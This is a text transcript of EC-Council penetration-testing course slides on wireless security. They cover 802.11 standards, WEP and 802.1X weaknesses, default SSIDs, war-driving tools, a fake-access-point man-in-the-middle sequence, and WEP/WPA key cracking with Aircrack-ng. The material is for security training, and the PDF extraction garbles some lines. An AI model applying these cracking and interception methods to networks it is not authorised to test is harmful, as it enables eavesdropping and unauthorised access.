ecsav4 module 06 advanced wireless testing_norestriction
Post on 08-Nov-2014
66 Views
Preview:
DESCRIPTION
TRANSCRIPT
Advanced Penetration Testing and Security
Analysisy
Module 6Advanced Wireless Testing
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Module Objective
h d l ll f l hThis module will familiarize you with:
• WarDriving with NetStumbler• How NetStumbler Works• “Active” vs. “Passive” WLAN Detection
Disabling the Beacon• Disabling the Beacon• Running NetStumbler• Captured Data Using NetStumbler• Filtering by ChannelsFiltering by Channels• Wireless Penetration Testing with Windows• AirCrack-ng• FMS and Korek attacks
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• Crack WEP
Wireless Conceptsp
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wireless Concepts
Wh l ‘Wi l ’ h d h f i When most people say ‘Wireless’ these days, they are referring to one of the 802.11 standards.
Wireless communication allows networks to extend to places Wireless communication allows networks to extend to places that might otherwise go untouched by wired networks.
There are three main 802.11 standards: B, A, and G.There are three main 802.11 standards: B, A, and G.
802.11 has weak authentication and encryption mechanisms.
Wireless, by its very nature, has no well-defined perimeter, making security more challenging.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
802.11 Types
• 2mbit/sec theoreticalb /• Uses CSMA/CA for Collision detection and avoidance• Can use either FHSS or DSSS for modulation• Had no well-defined implementation
802.11-Legacy:
• 11mbit/sec theoretical (5.9mbit usually)• Uses DSSS Modulation, splitting the 2.4ghz band into
h l8 b channels• SSID: Service Set Identifier; used for network
differentiation
802.11b:
• Operates in the 5ghz band• Uses OFDM modulation• Theoretical 54mbit, realistic ~25mbit
N t b k d tibl ith b802.11a:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• Not backwards compatible with b• Not widely deployed
802.11 Types (cont’d)
• Back in the 2.4ghz band• Theoretical 54mbit, realistic ~25mbit• Supports CCK (For compatibility with b)
802.11g:Supports CCK (For compatibility with b)
• Natively uses OFDM
• It is based on multiple-in/multiple out (MIMO) technology• Increased data rate up to 600 Mbps• RF band: 2.4 GHz or 5 GHz
802.11n:
• Channel width: 20 MHz or 40 MHz
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Core Issues with 802.11
No hard perimeter:
• A wired network runs from point A to point B; a wireless network runs all over the block.
• Eavesdropping and packet sniffing thus become trivial.trivial.
• Many government facilities cannot use wireless, even with higher-layer encryption, for this reason.P i i i i ‘i l d’ b • Perimeter security is sometimes ‘implemented’ by disabling SSID broadcasts. However, ‘stealthed’ networks are still visible.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Core Issues with 802.11 (cont’d)(cont d)
• RF communications are easy to take down:
Performance and easy Denial-of-Service:
co u cat o s a e easy to ta e dow : • Size does matter; The AP with the strongest signal wins
• With CSMA/CA, performance is crippled: • With the addition of WEP, performance drops even further
E h l l d D i l f• Easy access to the local segment means easy targeted Denial-of-Service attacks on the network level: • Packet flooding• ARP Spoofingp g
• No standard for roaming and hand-offs
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
What’s the Difference?
802.11 802.11a 802.11b 802.11g 802.11n
Frequency 2.4GHz 5 GHz 2.4GHz 2.4GHz 2.4 or 5GHzFrequency 4 5 4 4 4 5
Rate(s) 1 or 2 Mbps
6, 9, 12, 18, 24, 36, 48, 54 Mbps
1, 2, 5.5 or 11 Mbps
6, 9, 12, 18, 24, 36, 48, 54 Mbps
600 Mbps
Modulation FHSS/DSSS
OFDM DSSS OFDM DSSS/OFDM
Effective Data Throughput
1.2 Mbps 32 Mbps 5 Mbps 32 Mbps 100-200 Mbps
g p
Advertised Range
300 ft 225 ft 300 ft 300 ft 600 ft
Encryption Yes Yes Yes Yes Yes
Encryption Type 40 bit RC4 40 or 104 bit RC4
40 or 104 bit RC4
40 or 104 bit RC4
40 or 104 bit RC4
Authentication No No No No Yes
h h h h
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Network Support Ethernet Ethernet Ethernet Ethernet WLAN
Other Types of Wireless
HiperLAN2:
• European WLAN standard• 5 GHz range• Up to 54 Mbps
• Short distance device
Bluetooth:
• Short distance device• 2.4 GHz• 721 kbps to 10 Mbps depending on the version
Neither are compatible with 802.11 standards
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
802.16 – Wireless Metropolitan Area Network
Other Types of Wireless (cont’d)(cont d)
I f d (IR) hi h k t f Infrared (IR), which works at a frequency just below visible light
Narrowband, where data is sent and received on specific frequencies: received on specific frequencies:
• A license must be obtained from the FCC for this spacespace
Spread spectrum technology, which can send data over several frequencies
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
uniformly
Other Types of Wireless (cont’d)(cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Spread Spectrum Background
Spread spectrum was developed decades ago by the military to send communications that would be hard to detect or jam.
It involves varying the frequency of a signal over a large portion of the spectrum, instead of being focused as in conventional communications:
• It is a large part of the security mathematical sequence. • If the sequence is known, there is no added security, only If the sequence is known, there is no added security, only
survivability.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Channels
The station and AP must communicate over the same channel:
• The channel is configured at the AP.
When a station initializes or moves from one AP to another it will tune into the channel the AP is using:
• The client will tune into the strongest signal available because it ‘thinks’ that that is the closest AP.
When using several APs, they all need to be set to different channels to ensure cross talk does not occur:cross talk does not occur:
• Cross talk is when an AP picks up signals from another AP and its own signals may get corrupted.
• It requires the AP to do more error recovery and signal filtering.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
q y g g
Access Point
The access point (AP) bridges the wireless network to the wired network. The access point (AP) bridges the wireless network to the wired network.
The station and AP has to be configured to communicate over the same h lchannel.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Service Set ID
i d i ( )Stations and APs use Service Set IDs (SSIDs):
• SSID is a network name that logically contains ireless stations and APs ithin a specific WLAN wireless stations and APs within a specific WLAN
segment.
The SSID is usually broadcasted by the AP to any y y ylistening hosts.
SSID can represent two network segments.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Service Set ID (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Default SSIDs
The following are default SSIDs:
tsunami Cisco
101 3Com, Symbol
RoamAbout Default Network Name Lucent/ Cabletron
Default SSID Baystack 650/660
C C Compaq Compaq
WLAN Addtron, Dlink, SMC
Intel Intel
linksys or Wireless Linksys
Wireless Various
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
MAC Address SOHOware NetBlaster II
Chipsets
• Well supported in most wireless applicationsPrism II • Well supported in most wireless applications• Linksys, Older DLink
Prism II chipsets:
• Can usually be determined by small N-post adapter on the end of the chipset
• Lucent, Avaya, Enterasys
Orinoco chipsets:
• Usually supported by applications (not Netstumbler)
• Cisco Aironet 350 adaptersCisco chipset:
Cisco Aironet 350 adapters
• Extend the range and reduce the power consumption of 802.11 wireless networksAtheros
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
consumption of 802.11 wireless networks• AR5004X Clien, AR5004G ClientChipset:
Wi-Fi Equipment
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Expedient Antennas
WLAN can also be fun to experiment with.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUSRADIUS
Some early 802.1X implementations cannot use the per-session keys outline in the IEEE 802.1X standard to encrypt the data:
• Such implementations are vulnerable to many of the WEP attacks.
No means of authenticating the access point to the user:
• An attacker can easily spoof an access point and forward a • An attacker can easily spoof an access point and forward a users credential to the RADIUS server.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)
If the RADIUS server is used for authentication methods other than EAP, then the following vulnerabilities can apply:
• The RADIUS shared secret is vulnerable to offline dictionary attack based on capture of the Response Authenticator or
the following vulnerabilities can apply:
attack, based on capture of the Response Authenticator or Message-Authenticator attribute:
• Changing the shared secret between authentication methods will fix the vulnerabilities above.
• RADIUS can still be vulnerable to a brute-force attack.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)RADIUS (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Vulnerabilities to 802.1x and RADIUS (cont’d)and RADIUS (cont d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wired Equivalent PrivacyWired Equivalent Privacy
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Security - WEP
From ANSI/IEEE Std. 802.11:
“3 49 wired equivalent privacy (WEP): 3.49 wired equivalent privacy (WEP): The optional cryptographic confidentiality algorithm specified by IEEE 802.11 used to provide data confidentiality that is subjectively equivalent to the confidentiality of a wired local area network (LAN) medium that does not employ cryptographic techniques to enhance privacy.”techniques to enhance privacy.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wired Equivalent Privacy (WEP)(WEP)
Since wireless is inherently easy to eavesdrop on, WEP was created to provide ‘Equivalent Privacy’ to an unsecured created to provide Equivalent Privacy to an unsecured wired network.
WEP has three main goals:WEP has three main goals:
• Preventing casual eavesdroppingConfidentiality:
Control who is allowed to access • Control who is allowed to access the networkAccess control:
E th t t
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• Ensure that messages are not tampered with Data integrity:
Wired Equivalent Policy (WEP) (cont’d)(WEP) (cont d)
S f t b t WEP
• WEP uses RC4 for encryption and CRC32 f h k
Some facts about WEP:
RC4
for integrity checking.• WEP uses either 40 or 104 bit keys, which
are then added to a 24 bit initialization vector (which just happens to be vector (which just happens to be transmitted in the clear).
• WEP uses a shared key structure.• WEP significantly impacts network • WEP significantly impacts network
performance.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wired Equivalent Policy (WEP) (cont’d)(WEP) (cont d)
If working under SKA, a WEP key is required for authentication:
• The key can also be used for data encryption• The key can also be used for data encryption.
RC4 is a symmetric algorithm which only encrypts the payload of packets:payload of packets:
• RC4 does not encrypt the header or trailer data.• The same key is used for encryption and decryption processes.y yp yp p
The 802.11 standard specifies a 40-bit key and many vendors also offer a 104-bit key.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Exclusive OR
Exclusive OR (XOR) functionality: XOR is an operation that is applied to t o bits
• A function in binary mathematics. If both bits are the same, the result is zero (1 + 1 = 0).
operation that is applied to two bits:
• If the bits are different than each other, the result is one (1 + 0 = 1).
Logical “either/or”:
• Output is true if either, but not both, of inputs are true.Output is false if both inputs are false or both inputs are true
Logical either/or :
• Output is false if both inputs are false or both inputs are true.
Major function in all of cryptography.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Encryption Process
Message
Character Character Character Character
1010101 1101001 1100001 00110101010101 1101001 1100001 00110101101001 0010101 1101011 00101110111100 1111100 0001010 0001101
XOR function
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Values determined by key Resulting ciphertext
Encryption Process (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Chipping Sequence
1
Random sequence: 0100101101011001
Data stream: 1010
0
0
1
q
XOR of the two: 10111011101010010
1
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WEP Issues
CRC32 is not sufficient to ensure complete cryptographic integrity of a CRC32 is not sufficient to ensure complete cryptographic integrity of a packet:
• By capturing two packets, an attacker can reliably flip a bit in the encrypted stream and modify the checksum so that the packet is accepted stream, and modify the checksum so that the packet is accepted.
IV’s are 24 bits:
• An AP broadcasting 1500 byte packets at 11 mb/s would exhaust the entire IV space in five hours.
Known plaintext attacks:
• When there is an IV collision, it becomes possible to reconstruct the RC4 k b d ff f h d h d d l d f h k
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
keystream based off of the IV and the decrypted payload of the packet.
WEP Issues (cont’d)
i i k P dDictionary attacks:
• WEP is password-based
Password
Denial-of-Services:
i d di i h i d • Associate and disassociate messages are not authenticated
Eventually, an attacker can construct a decryption table of reconstructed key streams:y
• With about 24 GB of space, an attacker can use this table to decrypt WEP Packets in real-time
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WEP Issues (cont’d)
A lack of centralized key management makes it difficult to change WEP A lack of centralized key management makes it difficult to change WEP keys with any regularity.
IV is a value that is used to randomize the key stream value and each IV is a value that is used to randomize the key stream value and each packet has an IV value:
• The standard only allows 24 bits, which can be used up within hours at a busy APAP.
• IV values will be reused.
The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities:
• A mechanism that depends on randomness is not very random at all and attackers can easily figure out the key stream and decrypt other messages.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WEP - Authentication Phase
When a wireless station wants to access a network, it sends a probe prequest packet on all channels so that any AP in range will respond.
The AP responds with packets containing the
• When open system authentication (OSA) is configured, the station
The AP responds with packets containing the AP’s SSID and other network information:
will send an authentication request to the AP and the AP will make an access decision based on its policy.
• When shared key authentication (SKA) is configured, the AP will send a challenge to the station and the mobile station encrypts it send a challenge to the station and the mobile station encrypts it with its WEP key and sends it back to the AP:• If the AP can successfully decrypt, and obtain the challenge value the
mobile station’s access is authorized.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WEP - Shared Key Authentication
The requesting station sends the challenge text.
The receiving station:
• Decrypts the challenge using the same shared key• Decrypts the challenge using the same shared key.• Compares it to the challenge text sent earlier.• If they match, an acknowledgement is sent.• If no match sends a negative authentication noticeIf no match, sends a negative authentication notice.
Once acknowledged, the transmission is sent.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Receiving StationReceiving StationRequesting StationRequesting Station
WEP - Association Phase
After the authentication phase, the station will send the AP an association request packet.
If the AP has a policy to allow this station to access the network, it will i t th t ti t it lf b l i th t ti i it i ti t blassociate the station to itself by placing the station in its association table.
A wireless device has to be associated with an AP to access network resources and not just authenticatedresources, and not just authenticated.
The authentication and association phases authorize the device, and not the userthe user.
There is no way to know if an unauthorized user has stolen and is using an authorized device.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
authorized device.
WEP Flaws
Two basic flaws undermine its ability to protect against a serious attack. wo bas c aws u de e ts ab ty to p otect aga st a se ous attac .
No defined method for encryption key distribution:
• Pre-shared keys were set once at installation and are rarely (if ever) changed.
Use of RC4 which was designed to be a one time cipher and not intended Use of RC4, which was designed to be a one-time cipher and not intended for multiple message use:
• Since the pre-shared key is rarely changed, the same key is reused.A tt k it t ffi d fi d h l t k t th • An attacker monitors traffic and finds enough examples to work out the plaintext from message context.
• With knowledge of the ciphertext and plaintext, you can compute the key.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WEP Attack
It takes at least 10,000 packets to discover the key:
A l t f k d t i th f t t f • A large amount of known data is the fastest way of determining as many key streams as possible.
Wep Weggie (part of BSD Airtools) can be used to Wep Weggie (part of BSD-Airtools) can be used to generate a large number of small packets:
• The information may be as innocuous as the fields in h l h d h DNS the protocol header or the DNS name query.
• Monitoring is passive and therefore undetectable.• Simple tools and instructions are readily available to
recover the key
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
recover the key.
Wireless Security y
Technologies
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WPA Interim 802.11 Security
Wi-Fi Protected Access (WPA)
Interim Solution between WEP and 802.11i:
• Plugs holes in legacy 802.11 devices• Typically requires firmware or driver upgrade, but not
new hardware• Subset of the 802.11i and is forward compatible
Sponsored by the Wi-Fi Alliance:
Will i WPA f ifi i• Will require WPA for current certifications
Support announced by Microsoft, Intel, others
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WPA
Works similarly to 802.1X authentication:
• Both clients and AP must be WPA-enabled for encryption to and from 802.1X EAP serverKey in a passphrase (master key) in both client and AP
y
• Key in a passphrase (master key) in both client and AP• If passphrase matches, then AP allows entry to the network• Passphrase remains constant, but a new encryption key is generated
for each session
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WPA2 (Wi-Fi Protected Access 2)
WPA2 is compatible with the 802.11i standard.
WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.
WPA2 offers two mode of operation:
• Enterprise: Verifies network users through a server.• Personal: Protects unauthorized network access by utilizing a set-up
password.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
802.1X Authentication and EAPand EAP
802 1X:
• Framework to control port access between clients, the AP, and servers
802.1X:
Uses Extensible Authentication Protocol (EAP):
• EAP is discussed in RFC 2284 • Uses dynamic keys instead of the static WEP authentication key• Requires mutual authentication protocolRequires mutual authentication protocol• User’s transmission must go through WLAN AP to reach the server
performing the authentication:• Permits number of authentication methods
RADIUS i th k t d f t t d d
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• RADIUS is the market de facto standard
EAP Types
EAP-TLS:
• EAP is an extension of PPP providing for additional authentication methods.
• TLS provides for mutual authentication and session key exchange.
• Negotiated mutual key becomes master key for 802.11 TKIP.R i li d ifi (PKI b d)• Requires client and server certificates (PKI-based).
• Deployed by Microsoft for its corporate network.• Shipping in Windows 2000 and XP.
i di d i• EAP-TLS is discussed in RFC 2716.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Cisco LEAP
Lightweight Extensible Authentication Protocol
In August 2003 it was discovered that Cisco LEAP is vulnerable to brute-In August 2003, it was discovered that Cisco LEAP is vulnerable to brute-force and dictionary attacks:
• Therefore, Cisco warns users to adhere to strong passwords.
Use PEAP (Protected Extensible Authentication Protocol) instead of LEAP, which supports:
• Digital certificates. • One-time passwords.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
TKIP (Temporal Key Integrity Protocol)Integrity Protocol)
Q i k fi h f i k bl Quick fix to overcome the reuse of encryption key problem with WEP
Still uses WEP RC4 but changes temporal key every 10K Still uses WEP RC4, but changes temporal key every 10K packets
Mandates use of MIC to prevent packet forgeryMandates use of MIC to prevent packet forgery
Uses existing device calculation capabilities to perform the ti tiencryption operations
Improves security, but is still only a short-term fix
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wireless Networks Testing
This is a method for testing wireless access to a LAN and gis becoming increasingly popular.
However, some fairly alarming problems, security-wise, , y g p b , y ,are common when implementing these technologies.
Expected results:
• The outer-most physical edge of the wireless network.• The logical boundaries of the wireless network.
Expected results:
The logical boundaries of the wireless network.• Access points into the network.• IP range (and possibly DHCP-server) of the wireless network.• Exploitable "mobile units" (clients).
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wireless Networks Testing (cont’d)(cont d)
Verify the distance in which the wireless communication extends beyond the physical boundaries of the organizationboundaries of the organization
List equipment needed/tried (antenna, card, amplifier, software, etc.)
Verify authentication-method of the clients
Verify that encryption is configured and running
Verify what key length is used
Verify the IP range of the networkVerify the IP-range of the network
Verify the IP-range and reachable from the wireless network, and the protocols involved
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Probe network for possible DoS problems
Wireless Communications TestingCommunications Testing
This is a method of testing cordless communication d i hi h d h h i l d i d devices which may exceed the physical and monitored boundaries of an organization.
• The outer-most physical edge of the wireless communications
Expected results:
communications.• The logical boundaries of the wireless
communications.• List of communication types.yp• Type of wireless communication used and in what
spectrum.• List of frequencies emanating from the target.
Li t f l biliti i th i l
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
• List of vulnerabilities in the wireless communication present.
Report Recommendations
Verify that the organization has an adequate security policy that addresses the use of wireless technology including the use of 802 11use of wireless technology, including the use of 802.11.
Maintain a complete inventory of all wireless devices on the network.
Evaluate the physical access controls to Access Points (APs) and devices controlling them.
Determine if APs are turned off during portions of the day when they will not be in use .
Verify that the AP SSIDs have been changed.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Verify that all wireless clients have anti-virus software installed.
Wireless Attack Countermeasures
Enable 104-bit WEP
Change default SSID and disable its broadcast
I l t th l f th ti ti Implement another layer of authentication
Physically put AP at the center of the building
Logically put the AP in a DMZ with a firewall between the DMZ and internal network
Implement VPN for wireless stations to usep
Configure an ACL on AP and/or firewall to allow only known addresses into the network
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Assign static IPs to stations and disable DHCP
Wireless Penetration Testing with Windows with Windows
The first step in performing a wireless penetration test is The first step in performing a wireless penetration test is determining which wireless network is the target.
This is usually done by conducting a WarDrive.
Once you’ve determined the correct network to attack, you need to break any encryption used on the network.
Once the security is broken sniff for sensitive traffic.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Att k d T lAttacks and Tools
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
War Driving
War Driving is performed on a laptop/PC with a wireless NIC, antenna (omni directional is best) sniffers (TCPDump antenna (omni-directional is best), sniffers (TCPDump, Ethereal), NetStumbler, and AirSnort or WEPCrack.
NetStumbler finds WLAN APs and logs:
• Network name• SSID• MAC address of AP• Channel heard on• Signal strength• Signal strength• If WEP is enabled
AirSnort and WEPCrack runs algorithms on captured traffic to k WEP k
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
crack WEP keys.
War Driving (cont’d)
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
The Jargon – WarChalking
A marking method is only as good as the number of people that know it.
There is a common standard being developed amongst warchalkers to offer a common marking scheme.
Check out www.warchalking.org for more details.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
The Jargon –WarChalking (cont’d)WarChalking (cont d)
Bumper Sticker:Bumper Sticker:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WarPumpkin
WLAN hackers can adapt to seasonal changes:
• Open WLAN, SSID=GoAway, Speed=1.5Mbps
p g
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Wireless: Tools of the Trade
• Kismet• Netstumbler
Detectors:
• AirsnortCrackers:
• WEPCrackCrackers:
• MonkeyJack• AirJack
MITM tools:
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Mapping with Kismet
Kismet is a Linux wireless tool
It’s free
C ll k i dCaptures all packets received
Supports GPS and mapping
Logging is flexible and configurable
Installation can be difficultInstallation can be difficult
Requires driver and kernel patches
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Included with Knoppix
Mapping with Kismet (cont’d)
Comes with own gpsmap program
Does signal strength guessing and Not so accurate
gpsmap programg ginterpolation
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Kismet: Screenshot
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WarDriving with NetStumbler
NetStumbler is the application used most by WarDriverspp ythat use a Windows operating system.
While originally designed as a wireless network tool, NetStumbler has grown in popularity due to WarDrivers.
NetStumbler provides radio frequency (RF) signal information and other data related to combining computers and radios.
It also provides information on the band and data format being used depending on which wireless networking card
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
being used, depending on which wireless networking card is being implemented (802.11b, 802.11a, or 802.11g).
How Does NetStumbler Work?
NetStumbler is an active wireless network detection application that does not i l li t f i bpassively listen for, or receive, beacons.
It does not collect packets.
If it detects an infrastructure WLAN, it requests the AP’s name.
When it finds an ad-hoc WLAN, it requests the names of all of the peers it sees.
Its interface provides filtering and analysis toolsIts interface provides filtering and analysis tools.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
NetStumbler: Screenshot
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
“Active” vs. “Passive” WLAN DetectionWLAN Detection
NetStumbler is an “active” wireless network detection application that takes a specific action to accomplish application that takes a specific action to accomplish WLAN detection.
This action sends out a specific data probe called a Probe p pRequest.
The Probe Request frame and the associated Probe b q bResponse frame are part of the 802.11 standard.
Applications that employ “passive” detection do not Applications that employ passive detection do not broadcast any signals.
These programs listen to the radio band for any 802.11
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
These programs listen to the radio band for any 802.11 traffic that is within range of the wireless card.
Disabling the Beacon
NetStumbler transmits a Broadcast Request probe to discover the WLAN.q p
Most access points respond to a Broadcast Request by default.
When the access point responds, it transmits its SSID, MAC number, and other information.
Many brands and models of access points allow this feature to be disabled.
Once an access point ceases to respond to a request, NetStumbler can no longer detect it.
If d ’t t WLAN t h th f th N tSt bl
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
If you don’t want your WLAN to show up on the screen of another NetStumbler user, disable the SSID broadcast on your access point.
Running NetStumbler
When NetStumbler starts, it immediately attempts to locate a usable wireless card and a global positioning system (GPS) receiver.
The application also opens a new file with extension ns1 (NetStumbler1)The application also opens a new file with extension ns1 (NetStumbler1).
The file name is derived from the date and time when NetStumbler was started, and is in the YYYMMDDHHMMSS. ns1 format.
If a wireless card is located, the program begins to scan for nearby access If a wireless card is located, the program begins to scan for nearby access points.
The data from any located access points is immediately entered into the
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
The data from any located access points is immediately entered into the new file.
Captured Data using NetStumblerNetStumbler
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Filtering by Channels
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Airsnort
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
WEPCrack
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Monkey-Jack
Attacker launches DoS attackAttacker launches DoS attack
Victim’s 802.11 card scans channels to search for new AP
Victim’s 802.11 card associates with fake AP on the attack machine
A k hi i i h l APAttack machine associates with real AP
Attack machine is now inserted and can pass frames h h i h i h
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
through in a manner that is transparent to the upper level protocols
How Monkey-Jack Works
k hNo per-packet authentication:
• Client or AP can easily be spoofed
Client station will actively scan for new AP after being disassociated
Attacker impersonates AP:
• Offers authentication
Legitimate AP is clueless
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Before Monkey-Jack
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
After Monkey-Jack
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Monkey-Jack: Screenshot
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng
AirCrack-ng is available from www.aircrack-ng.org
Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.
Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ngng.
Aircrack-ng suite performs various statistical attacks to discover the WEP key with small amounts of captured data combined with brute forcing.
For cracking WPA/WPA2 pre shared keys a dictionary method is used For cracking WPA/WPA2 pre-shared keys, a dictionary method is used.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
AirCrack-ng: How Does it Work?How Does it Work?
Multiple techniques are combined to crack the WEP key:
• FMS ( Fluhrer, Mantin, Shamir) attacks - statistical techniques • Korek attacks - statistical techniques• Brute force
When using the statistical techniques to crack a WEP key, each byte of the key is basically handled individually.
i i i l h i h ibili h i b i h k i d i hUsing statistical mathematics, the possibility that a certain byte in the key is guessed right goes up to as much as 15% when you capture the right initialization vector (IV) for a particular key byte.
Certain IVs “leak” the secret WEP key for particular key bytes.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
This is the fundamental basis of the statistical techniques.
AirCrack-ng:FMS and Korek AttacksFMS and Korek Attacks
By using a series of statistical tests called the FMS and Korek attacks, votes are accumulated for likely keys for each key byte of the secret WEP keyfor likely keys for each key byte of the secret WEP key.
Different attacks have a different number of votes associated with them since the probability of each attack yielding the right answer varies mathematically.
The more votes a particular potential key value accumulates, the more likely it is to be correct.
For each key byte, the screen shows the likely secret key and the number of votes it has For each key byte, the screen shows the likely secret key and the number of votes it has accumulated so far.
The secret key with the largest number of votes is most likely correct but is not guaranteed.
The techniques and the approach above do not work for WPA/WPA2 pre-shared keys.
EC-CouncilCopyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
The only way to crack these pre-shared keys is via a dictionary attack.
